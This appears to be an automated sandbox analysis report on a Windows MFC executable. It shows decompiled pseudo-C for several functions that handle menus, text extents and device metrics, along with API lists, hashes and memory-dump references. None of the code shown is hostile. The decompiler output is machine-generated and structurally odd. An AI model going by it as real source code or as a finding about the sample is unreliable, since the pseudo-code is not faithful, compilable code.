Opcode ID: 8f7f21853fc02535df8f7155d1fad68840052196b025044c3b106b901a2ec67c
Instruction ID: cff185290df0cf97196083d5d4c8f011ae66752ebdec63b26ae71f7c0177c952
Opcode Fuzzy Hash: 8f7f21853fc02535df8f7155d1fad68840052196b025044c3b106b901a2ec67c
Instruction Fuzzy Hash: 89513B71900109DFCF11DFA8D984AEEBBB9FF48300F1481AAE905FB255DB74A985CB54

Uniqueness

Uniqueness Score: -1.00%

Function 00417E01, Relevance: 18.2, APIs: 12, Instructions: 154
windowCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E00417E01(void* __ecx, int _a4, signed int _a8) {
				signed int _v8;
				struct HMENU__* _v12;
				signed char _t63;
				struct HMENU__* _t64;
				intOrPtr _t69;
				signed int _t75;
				int _t77;
				void* _t81;
				struct HMENU__* _t84;
				struct HMENU__* _t86;
				intOrPtr _t87;
				intOrPtr _t90;
				intOrPtr* _t93;
				intOrPtr _t102;
				signed int _t107;
				signed int _t108;
				int _t110;
				signed int _t111;
				int _t112;
				signed int _t114;
				void* _t117;

				_push(__ecx);
				_push(__ecx);
				_t117 = __ecx;
				if((_a8 & 0x00000400) != 0) {
					_t110 = _a4;
					goto L4;
				} else {
					_v8 = _v8 & 0x00000000;
					_t81 = L004013CA(__ecx, _a4,  &_v8);
					if(_t81 != 0) {
						_t110 = _v8;
						_a8 = 0x400;
						_a4 = _t110;
						_t117 = _t81;
						L4:
						_t63 = GetMenuState( *(_t117 + 4), _t110, 0x400);
						if((_t63 & 0x00000008) == 0 || (_t63 & 0x00000010) != 0) {
							_t64 = GetSubMenu( *(_t117 + 4), _t110);
							_push(_t64);
							L0042635A();
							_t84 = _t64;
							_v12 = _t84;
							if(_t84 != 0) {
								_t111 =  *(_t117 + 0x24);
								while(1) {
									_t111 = _t111 - 1;
									if(_t111 < 0) {
										break;
									}
									if( *((intOrPtr*)( *((intOrPtr*)(_t117 + 0x20)) + _t111 * 4)) ==  *(_t84 + 4)) {
										_t75 =  *0x4421a0 - 1;
										_v8 = _t75;
										if(_t75 >= 0) {
											do {
												_t107 = _v8;
												if( *((intOrPtr*)( *0x44219c + _t107 * 4)) ==  *((intOrPtr*)( *((intOrPtr*)(_t117 + 0x20)) + _t111 * 4))) {
													_push(1);
													_push(_t107);
													L0042660C();
												}
												_t45 =  &_v8;
												 *_t45 = _v8 - 1;
											} while ( *_t45 >= 0);
										}
										_push(1);
										_push(_t111);
										L0042660C();
									}
									continue;
									while(1) {
										L26:
										_t112 = _t112 - 1;
										if(_t112 < 0) {
											break;
										}
										L004018C5(_t84, _t112, 0x400);
									}
									_t114 =  *((intOrPtr*)(_t117 + 0x10)) - 1;
									if(_t114 >= 0) {
										_t69 =  *((intOrPtr*)(_t117 + 0xc));
										_t86 =  *(_t84 + 4);
										_t93 = _t69 + _t114 * 4;
										while( *((intOrPtr*)( *_t93 + 0x14)) != _t86) {
											_t114 = _t114 - 1;
											_t93 = _t93 - 4;
											if(_t114 >= 0) {
												continue;
											} else {
											}
											L36:
											_t84 = _v12;
											goto L37;
										}
										_t87 =  *((intOrPtr*)(_t69 + _t114 * 4));
										if(_t87 != 0) {
											L0040158C(_t87);
											_push(_t87);
											L00425DF0();
										}
										_push(1);
										_push(_t114);
										L0042660C();
										goto L36;
									}
									L37:
									 *((intOrPtr*)(_t84->i + 4))(1);
									goto L38;
								}
								_t112 = GetMenuItemCount( *(_t84 + 4));
								goto L26;
							} else {
								_t77 = GetMenuItemID( *(_t117 + 4), _t110);
								_t102 =  *((intOrPtr*)(_t117 + 0x10));
								_t110 = 0;
								if(_t102 > 0) {
									_t108 =  *((intOrPtr*)(_t117 + 0xc));
									_v8 = _t108;
									while( *((intOrPtr*)( *_v8 + 0x14)) != _t77) {
										_v8 = _v8 + 4;
										_t110 = _t110 + 1;
										if(_t110 < _t102) {
											continue;
										} else {
										}
										goto L38;
									}
									_t90 =  *((intOrPtr*)(_t108 + _t110 * 4));
									goto L14;
								}
							}
						} else {
							_t90 =  *((intOrPtr*)( *((intOrPtr*)(_t117 + 0xc)) + _t110 * 4));
							L14:
							if(_t90 != 0) {
								L0040158C(_t90);
								_push(_t90);
								L00425DF0();
							}
							_push(1);
							_push(_t110);
							L0042660C();
						}
					}
				}
				L38:
				return RemoveMenu( *(_t117 + 4), _a4, _a8);
			}

0x00417e04
0x00417e05
0x00417e11
0x00417e13
0x00417e3a
0x00000000
0x00417e15
0x00417e15
0x00417e20
0x00417e27
0x00417e2d
0x00417e30
0x00417e33
0x00417e36
0x00417e3d
0x00417e42
0x00417e4b
0x00417e5d
0x00417e63
0x00417e64
0x00417e69
0x00417e6d
0x00417e70
0x00417ecc
0x00417ecf
0x00417ecf
0x00417ed0
0x00000000
0x00000000
0x00417edb
0x00417ee2
0x00417ee5
0x00417ee8
0x00417eea
0x00417ef0
0x00417efc
0x00417efe
0x00417f00
0x00417f06
0x00417f06
0x00417f0b
0x00417f0b
0x00417f0b
0x00417eea
0x00417f10
0x00417f12
0x00417f16
0x00417f16
0x00000000
0x00417f28
0x00417f28
0x00417f28
0x00417f29
0x00000000
0x00000000
0x00417f33
0x00417f33
0x00417f3d
0x00417f3e
0x00417f40
0x00417f43
0x00417f46
0x00417f49
0x00417f50
0x00417f51
0x00417f56
0x00000000
0x00000000
0x00417f58
0x00417f7a
0x00417f7a
0x00000000
0x00417f7a
0x00417f5a
0x00417f5f
0x00417f63
0x00417f68
0x00417f69
0x00417f6e
0x00417f6f
0x00417f71
0x00417f75
0x00000000
0x00417f75
0x00417f7d
0x00417f83
0x00000000
0x00417f83
0x00417f26
0x00000000
0x00417e72
0x00417e76
0x00417e7c
0x00417e7f
0x00417e83
0x00417e89
0x00417e8c
0x00417e8f
0x00417e99
0x00417e9d
0x00417ea0
0x00000000
0x00000000
0x00417ea2
0x00000000
0x00417ea0
0x00417ea7
0x00000000
0x00417ea7
0x00417e83
0x00417e51
0x00417e54
0x00417eaa
0x00417eac
0x00417eb0
0x00417eb5
0x00417eb6
0x00417ebb
0x00417ebc
0x00417ebe
0x00417ec2
0x00417ec2
0x00417e4b
0x00417e27
0x00417f86
0x00417f99

APIs

GetMenuState.USER32 ref: 00417E42
GetSubMenu.USER32 ref: 00417E5D
#2863.MFC42(00000000), ref: 00417E64
GetMenuItemID.USER32(?,?), ref: 00417E76
#825.MFC42(?), ref: 00417EB6
#5606.MFC42(00000000,00000001), ref: 00417EC2
#5606.MFC42(?,00000001,?,00000001,00000000), ref: 00417F06
#5606.MFC42(?,00000001,00000000), ref: 00417F16
GetMenuItemCount.USER32 ref: 00417F20
#825.MFC42(?), ref: 00417F69
#5606.MFC42(?,00000001), ref: 00417F75
RemoveMenu.USER32(?,?,?), ref: 00417F8F

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Menu$#5606$#825Item$#2863CountRemoveState
String ID:
API String ID: 854110321-0
Opcode ID: 7e8f228dcd200bf70590c35455aebc5b2240121b8c60256f2542e4bd8bb69d88
Instruction ID: 889c54a9b1e5abc700ff5ba3ce8cfd663d058620372859264272594a35cec5c8
Opcode Fuzzy Hash: 7e8f228dcd200bf70590c35455aebc5b2240121b8c60256f2542e4bd8bb69d88
Instruction Fuzzy Hash: 70518C35204205ABDB10DF15C981EABB7B6FF94304B50846EFA065B252DB38ED85CB18

Uniqueness

Uniqueness Score: -1.00%

Function 00401F78, Relevance: 18.1, APIs: 12, Instructions: 129
windowCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E00401F78(intOrPtr __ecx, void* __fp0) {
				int _t53;
				void* _t59;
				CHAR* _t60;
				char _t63;
				char _t81;
				char _t85;
				signed int _t87;
				intOrPtr _t90;
				intOrPtr _t93;
				CHAR* _t95;
				void* _t96;
				void* _t111;

				_t111 = __fp0;
				_t53 = E0042941D;
				L004269E6();
				_t93 =  *((intOrPtr*)(_t96 + 8));
				_t90 = __ecx;
				 *(_t96 - 0x14) = 0;
				if( *((intOrPtr*)(_t93 + 0x5c)) > 0) {
					do {
						_push( *(_t96 - 0x14));
						L004266D2();
						 *(_t96 - 0x10) = _t53;
						if(_t53 != 0 && GetMenuState( *(_t90 + 4), _t53, 0) != 0xffffffff) {
							_push(_t96 - 0x1c);
							_push(_t96 - 0x20);
							_push(_t96 - 0x10);
							_push( *(_t96 - 0x14));
							L004266C6();
							_t59 = L004013CA(_t90,  *(_t96 - 0x10), _t96 - 0x18);
							if(_t59 == 0) {
								L7:
								_push(0x24);
								L00425E38();
								if(_t59 == 0) {
									_t60 = 0;
								} else {
									_t60 = L00401D7F(_t59);
								}
								_push(_t60);
								_push( *((intOrPtr*)(_t90 + 0x10)));
								_t95 = _t60;
								L00426582();
							} else {
								_t87 =  *(_t96 - 0x18);
								if(_t87 < 0) {
									goto L7;
								} else {
									_t95 =  *( *((intOrPtr*)(_t59 + 0xc)) + _t87 * 4);
								}
							}
							_t95[0xc] =  *(_t96 + 0xc);
							_t95[0x14] =  *(_t96 - 0x10);
							_t95[0x10] = 0x100;
							_t63 =  *(_t96 - 0x1c);
							_t95[4] = _t63;
							if(_t95[0x1c] == 0) {
								_push(8);
								L00425E38();
								_t81 = _t63;
								 *(_t96 - 0x24) = _t81;
								 *(_t96 - 4) = 0;
								if(_t81 == 0) {
									_t63 = 0;
								} else {
									L00425F8E();
								}
								 *(_t96 - 4) =  *(_t96 - 4) | 0xffffffff;
								_t95[0x1c] = _t63;
							} else {
								L004266BA();
							}
							_push(1);
							_push(1);
							_push(0xff);
							_push( *0x440d0c);
							_push( *0x440d08);
							L00426000();
							if(E00401140(_t90, _t111, _t95[0x1c],  *(_t96 + 0xc)) == 0) {
								L004266BA();
								_t85 = _t95[0x1c];
								if(_t85 != 0) {
									 *((intOrPtr*)( *_t85 + 4))(1);
								}
								_t95[0xc] = _t95[0xc] | 0xffffffff;
								_t95[4] = _t95[4] | 0xffffffff;
								_t95[0x1c] = 0;
							}
							ModifyMenuA( *(_t90 + 4),  *(_t96 - 0x10), _t95[0x10],  *(_t96 - 0x10), _t95);
							_t93 =  *((intOrPtr*)(_t96 + 8));
						}
						 *(_t96 - 0x14) =  *(_t96 - 0x14) + 1;
						_t53 =  *(_t96 - 0x14);
					} while (_t53 <  *((intOrPtr*)(_t93 + 0x5c)));
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t96 - 0xc));
				return _t53;
			}

0x00401f78
0x004175d5
0x004175da
0x004175e4
0x004175ea
0x004175ef
0x004175f2
0x004175f8
0x004175f8
0x004175fd
0x00417604
0x00417607
0x00417626
0x0041762a
0x0041762e
0x0041762f
0x00417632
0x00417640
0x00417647
0x00417658
0x00417658
0x0041765a
0x00417662
0x0041766d
0x00417664
0x00417666
0x00417666
0x00417675
0x00417676
0x00417677
0x00417679
0x00417649
0x00417649
0x0041764e
0x00000000
0x00417650
0x00417653
0x00417653
0x0041764e
0x00417684
0x0041768a
0x0041768d
0x00417694
0x00417699
0x0041769c
0x004176a5
0x004176a7
0x004176ad
0x004176af
0x004176b4
0x004176b7
0x004176c0
0x004176b9
0x004176b9
0x004176b9
0x004176c2
0x004176c6
0x0041769e
0x0041769e
0x0041769e
0x004176c9
0x004176ce
0x004176d0
0x004176d5
0x004176db
0x004176e1
0x004176f5
0x004176fa
0x004176ff
0x00417704
0x0041770a
0x0041770a
0x0041770d
0x00417711
0x00417715
0x00417715
0x00417725
0x0041772b
0x0041772b
0x0041772e
0x00417731
0x00417734
0x004175f8
0x00417743
0x0041774b

APIs

_EH_prolog.MSVCRT ref: 004175DA
#3289.MFC42(?), ref: 004175FD
GetMenuState.USER32 ref: 00417612
#2920.MFC42(?,?,?,?), ref: 00417632
#823.MFC42(00000024,?,?,?,?,?,?), ref: 0041765A
#5860.MFC42(?,00000000,?,?,?,?,?,?), ref: 00417679
#2408.MFC42(?,00000000,?,?,?,?,?,?), ref: 0041769E
#823.MFC42(00000008,?,00000000,?,?,?,?,?,?), ref: 004176A7
#384.MFC42(?,00000000,?,?,?,?,?,?), ref: 004176B9
#2096.MFC42(000000FF,00000001,00000001,?,00000000,?,?,?,?,?,?), ref: 004176E1
#2408.MFC42(000000FF,00000001,00000001,?,00000000,?,?,?,?,?,?), ref: 004176FA
ModifyMenuA.USER32(000000FF,00000100,?,00000100,00000000), ref: 00417725

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #2408#823Menu$#2096#2920#3289#384#5860H_prologModifyState
String ID:
API String ID: 3567013300-0
Opcode ID: d95ecda323d3459c454e55ae82dddfd0a2ca2d5cc7ff9d8dbb165e23d2e670ec
Instruction ID: c5bae1ab05d204e738d98364756e76703c3fb78565332bd1f4e1fd9133c71a92
Opcode Fuzzy Hash: d95ecda323d3459c454e55ae82dddfd0a2ca2d5cc7ff9d8dbb165e23d2e670ec
Instruction Fuzzy Hash: 7741A270A00A15AFCB24DFA5D8819BEBBB5FF04324F50862FE526A7690DB34AD44CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0041E7B2, Relevance: 18.1, APIs: 12, Instructions: 106
windowCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E0041E7B2(intOrPtr* __ecx, void* __edx) {
				signed int _t51;
				void* _t53;
				void* _t61;
				intOrPtr _t65;
				int* _t71;
				struct tagSIZE _t77;
				signed int _t90;
				intOrPtr* _t93;
				void* _t95;

				L004269E6();
				_t93 = __ecx;
				_t51 =  *(__ecx + 0x3c);
				if(_t51 >= 1) {
					_push(_t51);
					_push(_t95 - 0xcc);
					L0042686A();
					L00425E08();
					_t53 = 2;
					 *(_t95 - 0x54) = _t53;
					_push(_t53);
					 *(_t95 - 4) = 0;
					_push(_t95 - 0x20);
					_push( *((intOrPtr*)(_t95 + 0xc)));
					L00426114();
					_t90 =  *(_t95 + 8);
					GetTextExtentPoint32A( *(_t90 + 8), " ", 1, _t95 - 0x2c);
					_t77 =  *(_t95 - 0x2c);
					 *(_t95 + 8) = 0;
					 *((intOrPtr*)(_t95 - 0x18)) =  *((intOrPtr*)(_t95 - 0x18)) - _t77;
					asm("cdq");
					_t51 = _t77 - __edx >> 1;
					 *((intOrPtr*)(_t95 - 0x20)) =  *((intOrPtr*)(_t95 - 0x20)) + _t51;
					if( *(__ecx + 0x3c) > 0) {
						_t71 = _t95 - 0xcc;
						do {
							SendMessageA( *( *__ecx + 0x20), 0x1019,  *_t71, _t95 - 0x54);
							_t61 = _t95 - 0x24;
							L00426042();
							 *(_t95 - 4) = 1;
							L00426054();
							 *(_t95 - 4) =  *(_t95 - 4) & 0x00000000;
							L00425DFC();
							 *((intOrPtr*)(_t95 - 0x18)) =  *((intOrPtr*)(_t95 - 0x18)) +  *((intOrPtr*)(_t95 - 0x4c));
							 *((intOrPtr*)( *_t90 + 0x70))( *((intOrPtr*)(_t95 - 0x10)), 0xffffffff, _t95 - 0x20, 0x824, _t61, _t61,  *((intOrPtr*)(_t95 + 0xc)),  *_t71);
							_t65 =  *((intOrPtr*)(_t95 - 0x14));
							 *((intOrPtr*)(_t95 - 0x28)) = _t65;
							_push(_t65);
							_push(0);
							_push(_t95 - 0x34);
							L004266F0();
							_push( *((intOrPtr*)(_t95 - 0x28)));
							_push( *((intOrPtr*)(_t93 + 0x28)));
							L004266EA();
							_t71 =  &(_t71[1]);
							 *((intOrPtr*)(_t95 - 0x20)) =  *((intOrPtr*)(_t95 - 0x20)) +  *((intOrPtr*)(_t95 - 0x4c));
							 *(_t95 + 8) =  *(_t95 + 8) + 1;
							_t51 =  *(_t95 + 8);
						} while (_t51 <  *((intOrPtr*)(_t93 + 0x3c)));
					}
					 *(_t95 - 4) =  *(_t95 - 4) | 0xffffffff;
					L00425DFC();
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t95 - 0xc));
				return _t51;
			}

0x0041e7b7
0x0041e7c3
0x0041e7c5
0x0041e7cb
0x0041e7d5
0x0041e7dc
0x0041e7dd
0x0041e7e5
0x0041e7ee
0x0041e7f1
0x0041e7f4
0x0041e7f8
0x0041e7fb
0x0041e7fc
0x0041e7ff
0x0041e804
0x0041e815
0x0041e81b
0x0041e81e
0x0041e823
0x0041e826
0x0041e829
0x0041e82b
0x0041e831
0x0041e837
0x0041e83d
0x0041e84e
0x0041e858
0x0041e85f
0x0041e868
0x0041e86c
0x0041e871
0x0041e878
0x0041e883
0x0041e895
0x0041e898
0x0041e89d
0x0041e8a0
0x0041e8a4
0x0041e8a6
0x0041e8a7
0x0041e8ac
0x0041e8b1
0x0041e8b4
0x0041e8bc
0x0041e8bf
0x0041e8c2
0x0041e8c5
0x0041e8c8
0x0041e83d
0x0041e8d1
0x0041e8d8
0x0041e8de
0x0041e8e3
0x0041e8eb

APIs

_EH_prolog.MSVCRT ref: 0041E7B7
#6678.MFC42(?,?), ref: 0041E7DD
#540.MFC42(?,?), ref: 0041E7E5
#3293.MFC42(?,?,00000002,?,?), ref: 0041E7FF
GetTextExtentPoint32A.GDI32(?,00440E84,00000001,?), ref: 0041E815
SendMessageA.USER32 ref: 0041E84E
#3301.MFC42(?,?,?), ref: 0041E85F
#858.MFC42(00000000,?,?,?), ref: 0041E86C
#800.MFC42(00000000,?,?,?), ref: 0041E878
#4297.MFC42(?,00000000,?), ref: 0041E8A7
#4133.MFC42(?,?,?,00000000,?), ref: 0041E8B4
#800.MFC42(?,?,?,00000000,?), ref: 0041E8D8

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #800$#3293#3301#4133#4297#540#6678#858ExtentH_prologMessagePoint32SendText
String ID:
API String ID: 2082914737-0
Opcode ID: be2edd2b11a516fe14d06f5a0d1feba22e0de5d5e4f59032e3e529f73f10ab9c
Instruction ID: c0926475d1c27eeeea360d0744a8ccabee37694dabc5e6789e545c3e2c5a9e8c
Opcode Fuzzy Hash: be2edd2b11a516fe14d06f5a0d1feba22e0de5d5e4f59032e3e529f73f10ab9c
Instruction Fuzzy Hash: D7417C71A00218EFDB14EF95C885EEEBBB5FF48314F50852AF411A7291DB74AE44CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00415C24, Relevance: 18.1, APIs: 12, Instructions: 104
windowCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E00415C24(void* __ecx) {
				CHAR* _t54;
				intOrPtr _t55;
				void* _t60;
				signed int _t62;
				signed int _t63;
				signed int _t66;
				void* _t85;
				void* _t87;

				L004269E6();
				_t85 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x50)) != 0) {
					_push(_t62);
					L00425E08();
					 *(_t87 - 4) = 0;
					L00425E08();
					_t63 = _t62 | 0xffffffff;
					 *(_t87 - 4) = 1;
					 *(_t87 - 0x18) = _t63;
					 *(_t87 - 0x1c) = _t63;
					 *((intOrPtr*)(_t87 - 0x28)) = 0;
					 *(_t87 - 0x10) = 0;
					 *((intOrPtr*)(_t87 - 0x24)) =  *((intOrPtr*)(__ecx + 0x10));
					_t54 = GetMenuItemCount( *(__ecx + 4));
					 *(_t87 - 0x30) = _t54;
					if(_t54 <= 0) {
						L17:
						 *(_t87 - 4) =  *(_t87 - 4) & 0x00000000;
						L00425DFC();
						 *(_t87 - 4) =  *(_t87 - 4) | 0xffffffff;
						L00425DFC();
						_t55 =  *((intOrPtr*)(_t87 - 0x28));
						L18:
						 *[fs:0x0] =  *((intOrPtr*)(_t87 - 0xc));
						return _t55;
					}
					while(_t63 == 0xffffffff) {
						_push(0x400);
						L0042601E();
						GetMenuStringA( *(_t85 + 4),  *(_t87 - 0x10), _t54, 0x100, 0x100);
						_push(_t63);
						L00426018();
						if( *((intOrPtr*)( *((intOrPtr*)(_t87 - 0x14)) - 8)) <= 0) {
							L12:
							 *(_t87 - 0x10) =  *(_t87 - 0x10) + 1;
							_t54 =  *(_t87 - 0x10);
							if(_t54 <  *(_t87 - 0x30)) {
								continue;
							}
							break;
						}
						_t66 = 0;
						if( *((intOrPtr*)(_t87 - 0x24)) <= 0) {
							L11:
							_t63 =  *(_t87 - 0x18);
							goto L12;
						} else {
							goto L7;
						}
						while(1) {
							L7:
							_t60 = L0040154B( *((intOrPtr*)( *((intOrPtr*)(_t85 + 0xc)) + _t66 * 4)));
							 *(_t87 - 4) = 2;
							L00426054();
							 *(_t87 - 4) = 1;
							L00425DFC();
							__imp___mbscmp( *((intOrPtr*)(_t87 - 0x14)),  *((intOrPtr*)(_t87 - 0x20)), _t60, _t87 - 0x2c);
							if(_t60 == 0) {
								break;
							}
							_t66 = _t66 + 1;
							if(_t66 <  *((intOrPtr*)(_t87 - 0x24))) {
								continue;
							}
							goto L11;
						}
						 *(_t87 - 0x1c) = _t66;
						 *(_t87 - 0x18) =  *(_t87 - 0x10);
						goto L11;
					}
					if(_t63 >= 0 &&  *(_t87 - 0x1c) >= 0 && _t63 >=  *(_t87 - 0x1c)) {
						 *((intOrPtr*)(_t87 - 0x28)) = _t63 -  *(_t87 - 0x1c);
					}
					goto L17;
				}
				_t55 = 0;
				goto L18;
			}

0x00415c29
0x00415c33
0x00415c3a
0x00415c43
0x00415c47
0x00415c4f
0x00415c52
0x00415c5d
0x00415c60
0x00415c64
0x00415c67
0x00415c6a
0x00415c6d
0x00415c70
0x00415c73
0x00415c7b
0x00415c7e
0x00415d39
0x00415d39
0x00415d40
0x00415d45
0x00415d4c
0x00415d51
0x00415d55
0x00415d5a
0x00415d62
0x00415d62
0x00415c89
0x00415c92
0x00415c9c
0x00415ca8
0x00415cae
0x00415cb2
0x00415cbe
0x00415d15
0x00415d15
0x00415d18
0x00415d1e
0x00000000
0x00000000
0x00000000
0x00415d1e
0x00415cc0
0x00415cc5
0x00415d12
0x00415d12
0x00000000
0x00000000
0x00000000
0x00000000
0x00415cc7
0x00415cc7
0x00415cd1
0x00415cda
0x00415cde
0x00415ce6
0x00415cea
0x00415cf5
0x00415cff
0x00000000
0x00000000
0x00415d01
0x00415d05
0x00000000
0x00000000
0x00000000
0x00415d07
0x00415d0c
0x00415d0f
0x00000000
0x00415d0f
0x00415d26
0x00415d36
0x00415d36
0x00000000
0x00415d26
0x00415c3c
0x00000000

APIs

_EH_prolog.MSVCRT ref: 00415C29
#540.MFC42 ref: 00415C47
#540.MFC42 ref: 00415C52
GetMenuItemCount.USER32 ref: 00415C73
#2915.MFC42(00000100,00000100,00000400), ref: 00415C9C
GetMenuStringA.USER32(00000001,?,00000000,00000100,00000100), ref: 00415CA8
#5572.MFC42 ref: 00415CB2
#858.MFC42(00000000,?), ref: 00415CDE
#800.MFC42(00000000,?), ref: 00415CEA
_mbscmp.MSVCRT ref: 00415CF5
#800.MFC42 ref: 00415D40
#800.MFC42 ref: 00415D4C

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #800$#540Menu$#2915#5572#858CountH_prologItemString_mbscmp
String ID:
API String ID: 4192183024-0
Opcode ID: 449a7bfc7df495904d8d72cc89c83eec8cfa6fda10e6f2e75a780442847b1141
Instruction ID: caf6a409167d17845b4752707249a6806e9cb5a119e4276d03092a6889bb1504
Opcode Fuzzy Hash: 449a7bfc7df495904d8d72cc89c83eec8cfa6fda10e6f2e75a780442847b1141
Instruction Fuzzy Hash: F6414975D00619DBCB00DFAAD989AEEFBB4FF48314F60852EE011B3291D7785A44CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0041E67B, Relevance: 18.1, APIs: 12, Instructions: 102
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E0041E67B(intOrPtr* __ecx, int _a4) {
				struct HDC__* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				struct tagTEXTMETRICA _v80;
				struct HDC__* _t68;
				signed int _t70;
				signed int _t74;
				signed int _t91;
				signed int _t93;
				intOrPtr _t95;
				int _t97;
				signed int _t110;
				intOrPtr* _t122;

				_t122 = __ecx;
				_push(0);
				_push( &_v24);
				_push(0);
				L00426114();
				_t68 = GetDC( *( *__ecx + 0x20));
				_push(_t68);
				L00425FD0();
				_v8 = _t68;
				if(_t68 != 0) {
					GetTextMetricsA( *(_t68 + 8),  &_v80);
					_t97 = _a4;
					_t70 = GetDeviceCaps( *(_t97 + 8), 8);
					asm("cdq");
					 *(_t122 + 0x40) = _t70 / ((_v80.tmAveCharWidth + _v80.tmAveCharWidth * 2 << 2) - _v24 + _v16);
					_a4 = GetDeviceCaps( *(_t97 + 8), 0x5a);
					_t74 = GetDeviceCaps( *(_v8 + 8), 0x5a);
					asm("cdq");
					 *(_t122 + 0x44) = _a4 / _t74;
					ReleaseDC( *( *_t122 + 0x20),  *(_v8 + 4));
					_a4 = GetDeviceCaps( *(_t97 + 8), 0xa);
					SetRect(_t122 + 0x20, 0, 0, GetDeviceCaps( *(_t97 + 8), 8), _a4);
					_t110 = _v80.tmAveCharWidth;
					 *(_t122 + 0x2c) =  *(_t122 + 0x2c) /  *(_t122 + 0x44);
					 *(_t122 + 0x20) = _t110 << 2;
					 *(_t122 + 0x28) =  *(_t122 + 0x28) /  *(_t122 + 0x40) - (_t110 << 3);
					_t91 = _v12 - _v20;
					 *(_t122 + 0x30) = _t91;
					_a4 = _t91 *  *(_t122 + 0x44);
					_t93 = GetDeviceCaps( *(_t97 + 8), 0xa);
					asm("cdq");
					_t95 = _t93 / _a4 - 7;
					 *((intOrPtr*)(_t122 + 0x34)) = _t95;
					return _t95;
				}
				return _t68;
			}

0x0041e682
0x0041e687
0x0041e68b
0x0041e68c
0x0041e68e
0x0041e698
